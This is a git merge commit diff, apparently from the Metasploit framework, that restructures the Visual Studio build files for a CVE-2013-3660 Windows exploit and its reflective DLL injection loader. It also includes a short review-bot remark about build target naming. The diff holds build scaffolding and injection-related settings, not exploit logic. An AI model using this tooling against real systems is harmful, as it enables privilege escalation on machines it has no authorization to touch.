Merge remote-tracking branch 'upstream/master' into submodule

Conflicts:
	external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
bug/bundler_fix
Meatballs 2013-12-08 18:25:03 +00:00
commit ab1ddac0c8
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
116 changed files with 2458 additions and 1514 deletions


@ -20,7 +20,7 @@ wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com> wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com> wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com> wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu> wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
# Above this line are current Rapid7 employees. Below this paragraph are # Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at # volunteers, former employees, and potential Rapid7 employees who, at
@ -40,8 +40,8 @@ Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)> Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc> ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc> ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be> corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be> corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com> darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com> efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <> efraintorres <efraintorres@github> et <>



@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -1,357 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="reflective_dll"
ProjectGUID="{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
RootNamespace="reflective_dll"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="1"
GenerateDebugInformation="true"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy ..\Release\reflective_dll.dll ..\bin\"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="2"
WholeProgramOptimization="0"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
WholeProgramOptimization="false"
PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="2"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
OutputFile="$(OutDir)\$(ProjectName).x64.dll"
LinkIncremental="1"
GenerateDebugInformation="true"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy $(OutDir)\$(ProjectName).x64.dll ..\bin\"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\src\ReflectiveDll.c"
>
</File>
<File
RelativePath=".\src\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\src\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\src\ReflectiveLoader.h"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>


@ -1,270 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
<RootNamespace>reflective_dll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v100</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>exploit</TargetName>
<SourcePath>$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\;</SourcePath>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
<SourcePath>$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\;</SourcePath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>true</BufferSecurityCheck>
<CompileAs>Default</CompileAs>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OutputFile>$(OutDir)$(ProjectName).arm.dll</OutputFile>
</Link>
<PostBuildEvent>
<Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsCpp</CompileAs>
</ClCompile>
<Link>
<OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
<ClCompile Include="src\ReflectiveDll.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
<ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
<ClInclude Include="src\ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -1,32 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="src\ReflectiveDll.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="src\ReflectiveLoader.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\ReflectiveDLLInjection.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ReflectiveLoader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ComplexPath.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>


@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\ppr_flatten_rec.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-3660 ppr_flatten_rc x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="ppr_flatten_rec is not supported in x64" />
</Target>
</Project>
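Review bot: The x86 target's Message text names the project `ppr_flatten_rc` while the solution it builds is `ppr_flatten_rec` (see the SolutionPath property and the .sln in this commit), so the build log will not match the artifact name; the line should read `<Message Text="Building CVE-2013-3660 ppr_flatten_rec x86 Release version" />`. The x64 target only prints a message and then succeeds, so a caller that invokes `x64` gets a green build with no DLL produced; if anything scripts around the exit status, consider `<Error Text="ppr_flatten_rec is not supported in x64" />` instead, otherwise a comment stating that this target is intentionally a no-op would save the next reader a look. `Targets="Clean;Rebuild"` is also redundant, since Rebuild already performs the clean.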


@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ppr_flatten_rec", "ppr_flatten_rec\ppr_flatten_rec.vcxproj", "{942BF20A-E438-48B0-A614-A6E0CC2E94BD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.ActiveCfg = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.Build.0 = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.ActiveCfg = Release|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -418,19 +418,10 @@
# define WIN32_NO_STATUS # define WIN32_NO_STATUS
#endif #endif
#include <stdio.h> #include <stdio.h>
#include <stdarg.h>
#include <stddef.h>
#include <windows.h>
#include <assert.h>
#ifdef WIN32_NO_STATUS #ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS # undef WIN32_NO_STATUS
#endif #endif
#include <ntstatus.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW") #pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE #ifndef PAGE_SIZE
@ -448,11 +439,6 @@ static ULONG ComplexPathNumRegion = 0;
